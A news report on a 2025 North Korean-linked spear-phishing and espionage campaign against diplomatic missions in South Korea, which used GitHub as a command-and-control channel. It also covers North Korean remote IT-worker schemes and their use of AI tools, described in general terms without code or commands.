Between March and July 2025, North Korean cyber operatives orchestrated a sophisticated espionage campaign targeting diplomatic missions in South Korea. The attackers employed at least 19 spear-phishing emails, meticulously crafted to impersonate trusted diplomatic contacts. These emails, written in multiple languages including Korean, English, Persian, Arabic, French, and Russian, contained convincing meeting invitations, official letters, and event announcements.
According to Trellix researchers Pham Duy Phuc and Alex Lanstein, the attackers utilized GitHub, a legitimate developer platform, as a covert command-and-control channel. The infection chain began with the delivery of password-protected malicious ZIP files hosted on platforms like Dropbox, Google Drive, or Daum Cloud. These archives contained Windows shortcut (LNK) files disguised as PDF documents. When opened, these shortcuts executed PowerShell scripts that fetched additional malware from GitHub, specifically a variant of the open-source remote access trojan (RAT) known as Xeno RAT. This malware granted the attackers control over compromised systems.
The campaign is attributed to the North Korean hacking group Kimsuky, previously linked to phishing attacks that employed GitHub to stage the MoonPeak variant of Xeno RAT. Despite overlaps in infrastructure and tactics, some indicators suggest potential involvement of China-based operatives.
The spear-phishing emails were designed to mimic legitimate diplomatic correspondence, incorporating official signatures, diplomatic terminology, and references to real events such as summits and forums. By impersonating trusted entities like embassies, ministries, and international organizations, the attackers enhanced the credibility of their lures.
Upon execution, the PowerShell script harvested system information and exfiltrated it to a private GitHub repository controlled by the attackers. It also retrieved additional payloads by parsing a text file (onf.txt) in the repository to extract a Dropbox URL hosting the MoonPeak trojan. The attackers demonstrated rapid infrastructure rotation, updating the onf.txt payload multiple times within an hour to deploy malware and remove traces after use. This rapid update cycle, combined with the use of cloud infrastructure, helped the malicious activities evade detection.
A time-based analysis of the attackers’ activity revealed that most operations originated from a timezone consistent with China, with a smaller proportion aligning with that of the Koreas. Notably, a perfect 3-day pause in activity coincided with Chinese national holidays in early April 2025, but not with North or South Korean holidays. This observation raises the possibility that the campaign could be the result of North Korean operatives working from Chinese territory, a Chinese advanced persistent threat (APT) operation mimicking Kimsuky techniques, or a collaborative effort leveraging Chinese resources for North Korean intelligence gathering.
In a related development, CrowdStrike reported that over the past 12 months, more than 320 incidents involved North Koreans posing as remote IT workers to infiltrate companies and generate illicit revenue for the regime. This represents a 220% increase from the previous year. These operatives, tracked as Famous Chollima and Jasper Sleet, are believed to use generative artificial intelligence (GenAI) coding assistants like Microsoft Copilot or VSCodium and translation tools to assist with their daily tasks and communications. They are also likely to work multiple jobs simultaneously.
A crucial component of these operations involves recruiting individuals to run laptop farms, which consist of racks of corporate laptops used by the North Koreans to remotely perform their work using tools like AnyDesk, simulating physical presence in the countries where the companies are based.
Famous Chollima IT workers use GenAI to create attractive résumés, reportedly employ real-time deepfake technology to mask their true identities in video interviews, and leverage AI code tools to assist in their job duties. These tactics pose substantial challenges to traditional security defenses.
A leak of 1,389 email addresses linked to these IT workers revealed that 29 of the 63 unique email service providers are online tools allowing users to create temporary or disposable email addresses. Another six are related to privacy-focused services like Skiff, Proton Mail, and SimpleLogin. Nearly 89% of the email addresses are Gmail accounts, all guarded using Google Authenticator, two-factor authentication (2FA), and recovery backup emails. Many usernames include terms like developer, code, coder, tech, and software, indicating a focus on technology and programming.
Some of these email addresses appear in a user database leak of the AI photo editing tool Cutout.Pro, suggesting potential use of the software to alter images for social media profiles or identification documents.
